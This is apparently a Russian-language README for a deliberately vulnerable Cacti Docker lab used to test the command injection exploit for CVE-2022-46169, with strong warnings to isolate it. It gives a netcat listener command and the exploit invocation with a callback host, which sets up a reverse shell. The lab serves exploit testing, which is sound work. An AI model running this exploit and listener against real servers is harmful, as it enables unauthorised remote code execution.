
ВНИМАНИЕ: Это уязвимое приложение для тестирования эксплойта Cacti command injection (CVE-2022-46169). Запускайте на свой страх и риск!
Это уязвимое приложение для тестирования эксплойта уязвимости Cacti (CVE-2022-46169).
Это приложение содержит серьезные уязвимости безопасности. Запускайте его на свой страх и риск! Рекомендуется использовать резервную и изолированную среду (например, ВМ с недавним снимком и сетью только для хоста). Не загружайте это приложение на серверы, доступные из Интернета, так как они будут скомпрометированы.
ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: Я не несу ответственности за то, как кто-либо использует это приложение. Единственная цель этого приложения — быть тестовым сценарием для эксплойта CVE-2022-46169, и его не следует использовать в злонамеренных целях. Если ваш сервер будет скомпрометирован вследствие установки этого приложения, это не моя ответственность, а ответственность лица(лиц), загрузивших и установивших его.
Вот шаги для настройки окружения:
docker compose up -d, чтобы запустить композицию.admin/admin.Контейнер будет называться vuln-cacti.
Для уничтожения окружения используйте команду docker compose down.
Официальное руководство по установке Cacti можно найти здесь.
Подробное описание коренной причины уязвимости доступно здесь.
Публичный эксплойт доступен на Exploit-DB. Для простоты он скопирован в папку exploit/.
Чтобы запустить его:
nc -lvp 6669
./exploit/exploit.py -u http://127.0.0.1/cacti/ -i host.docker.internal -p 6669
host.docker.internal используется для доступа к хост-машине из контейнера (ссылка).Также есть запись в репозитории vulhub.
Этот проект лицензирован по лицензии Unlicense - подробности см. в файле LICENSE.